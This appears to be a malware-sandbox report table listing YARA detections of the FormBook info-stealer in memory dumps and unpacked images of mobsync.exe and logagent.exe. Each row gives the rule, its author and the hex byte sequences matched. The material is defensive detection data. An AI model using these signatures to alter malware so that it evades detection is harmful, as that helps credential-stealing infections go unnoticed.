00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.700902769.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.775973432.0000000000D80000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.804512443.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.701236114.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000000.796733965.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000000.752416776.000000000E234000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.946446675.0000000000BF0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 61 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.mobsync.exe.72480000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.mobsync.exe.72480000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.mobsync.exe.72480000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
18.0.mobsync.exe.72480000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
18.0.mobsync.exe.72480000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.0.mobsync.exe.72480000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
15.0.logagent.exe.72480000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.0.logagent.exe.72480000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.0.logagent.exe.72480000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
18.0.mobsync.exe.72480000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
18.0.mobsync.exe.72480000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.0.mobsync.exe.72480000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
18.2.mobsync.exe.72480000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
18.2.mobsync.exe.72480000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.2.mobsync.exe.72480000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
15.0.logagent.exe.72480000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
15.0.logagent.exe.72480000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.0.logagent.exe.72480000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
5.0.mobsync.exe.72480000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.mobsync.exe.72480000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.mobsync.exe.72480000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.0.mobsync.exe.72480000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.mobsync.exe.72480000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.mobsync.exe.72480000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.0.mobsync.exe.72480000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.mobsync.exe.72480000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.mobsync.exe.72480000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
18.0.mobsync.exe.72480000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
18.0.mobsync.exe.72480000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.0.mobsync.exe.72480000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.0.mobsync.exe.72480000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.0.mobsync.exe.72480000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.mobsync.exe.72480000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
18.0.mobsync.exe.72480000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
18.0.mobsync.exe.72480000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
18.0.mobsync.exe.72480000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
18.0.mobsync.exe.72480000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
